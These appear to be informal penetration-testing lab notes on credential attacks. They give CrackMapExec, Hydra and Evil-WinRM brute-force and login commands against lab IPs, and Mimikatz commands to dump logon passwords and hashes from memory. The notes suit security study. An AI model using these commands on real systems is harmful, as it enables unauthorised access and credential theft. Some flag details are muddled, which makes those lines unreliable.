We can use diffrent tools to crack the passwords 

Option 1) CrackMapExec :- We can use Crackmapexec to crack the password for diffrent protocols like SMB, FTP, mssql, ssh etc. 
              #crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>
                e.g. crackmapexec rdp 10.129.42.197 -u user.list -p password.list
                e.g. crackmapexec ssh 10.129.42.197 -U username -p password.list :- When we have the username 
                e.g  crackmapexec ftp 10.129.42.197 -u user.list -P <Password> :- When we have password and checking if one else is using the same password. 


Option 2) Evil-WinRM :- We can use this tool to crak password and get the connection to the device
              #evil-winrm -i <target-IP> -u <username> -p <password>
                e.g.   evil-winrm -i 10.129.42.197 -u user -p password


Option 3) hydra :- This is a handy tool which can be used for many applications 
              #hydra -L user.list -P password.list <protocol>://<IP address>
                e.g. hydra -L user.list -P password.list ssh://10.129.42.197

Option 4) We can usemi Mimikatz to get the NT hash of the usernames 
          # mimikatz.exe 
          # privilege::debug
          # sekurlsa::logonpasswords

====================================================================================================================================================================

We can use Mimikatz and Rebues to grab TGT or TGS 
